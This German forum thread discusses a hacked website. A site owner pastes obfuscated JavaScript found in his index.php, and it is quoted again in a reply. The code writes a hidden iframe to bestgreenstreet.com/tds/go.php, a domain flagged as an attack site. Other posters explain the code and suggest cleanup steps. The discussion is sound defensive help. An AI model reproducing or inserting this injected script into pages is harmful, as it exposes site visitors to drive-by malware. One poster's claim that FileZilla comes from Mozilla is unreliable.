wichtig, brauche rat eines proggers | BestGreenStreet.com Malware

[dude32]

hallo

habe von eingen user vermehrt erfahren, das ihr virenscanner alarm schlägt, wenn sie einer meiner seiten besuchen

habe mir nun mal die index vorgenommen und folgendes gefunden:

PHP-Code:

<meta name="verify-v1" content="rXQqvX7jV6XCe0D/jrv036HrngHHXk+e72Csl6upeEs=" /> 
<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c --> 


was ist das????

[Gremlin]

Also das verify-v1 müsste ein Meta-Tag sein was du mal bei Analytics o.Ä. benutzt hast.

Der zweite Code:

Code:

<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->

Das ding erzeugt ein iframe zu einer Domain:
http://bestgreenstreet.com/tds/go.php?sid=1&xu=j Absichtlich nicht verlinkt

Diese meldet Firefox als attackierende Webseite!

Also raus damit! Wie er nun darein kam weiß ich nicht, da müsste man ursachenforschung betreiben, irgendeine Lücke in einem Script. Bei klamm gibt es auch einen Thread dazu http://www.klamm.de/forum/showthread.php?t=223792

[dude32]

und wie kommt das in die index.php der seiten rein???
ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de

[maniwelt]

Ausserdem noch folgendes in einem forum gefunden:

Damit Google deine Sitemap überhaupt annimmt und einliest, musst du dich anmelden und verifizieren, entweder durch so einen Meta-Tag oder durch eine erstellte HTML-Seite mit einem vorgegebenen Namen.

Sollte auch dein Fall sein

[dude32]

habe nie eine sitemap erstellt, oder einen code dafür eingefügt

[maniwelt]

Sollte aber der Fall sein, lies mal hier duch:

http://www.typo3forum.net/forum/html...1-content.html


EDIT:

Beim KLAMM auch was interessantes gefunden

http://www.klamm.de/forum/showthread.php?t=223792

[Benutzer1699]

benutzt du filezilla zum Übertragen deiner Websites?

[jpwfour]

und wie kommt das in die index.php der seiten rein???
ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de

naja, wer sagt denn, dass der/die betreffende person/bot nicht ftp zugang hat? oder gibt es bei dir dazu logs?

also auf jeden fall mal passwörter ändern (kann ja mal nie schaden), evtl wurden diese auch per bruteforce geknackt, oder dein hoster hat eine sicherheitslücke, oder ein anderer user, der auf dem gleichen server wie du ist, hat eine möglichkeit entdeckt, dateien anderer zu bearbeiten (kann schon immer mal wieder besonders bei freehostern oder "kleineren" hoster auftreten).

oder aber ein addon/script, was du guten gewissens installiert/hinzugefügt hast, verändert deine php dateien...

also möglichkeiten gibt es viele, die eigentliche ursache rauszufinden kann aber doch auch schwierig werden.

erstmal natürlich alle solcher änderungen rückgängig machen,
ftp passwort ändern,
evtl logs durchsuchen (sofern vorhanden),
das ganze dem support des hosters mitteilen,
hoffen, dass der schadcode/adcode nicht gleich wieder drin ist...

evtl hast du auch einen trojaner/sonstigen blödsinn auf deinem rechner, der deinen ftp clienten infiziert/manipuliert hat, so dass beim übertragen von dateien immer dieser code hinzugefügt wird (kann man ja testen).

also auch mal kompletten virenscann machen

[DimpleX]

da gab es doch mal ein problem mit dem mozilla kostenlosen filezilla-ftp programm das index.php geändert hat weil es infiziert war

gibt irgendwo alten beitrag, schon vor 2-3 jahren mal in gespräch gewesen hier

DimpleX

und wie kommt das in die index.php der seiten rein???
ohne ftp zugang??? betrifft ja nicht nur meine seiten, sondern auch lose-segen.de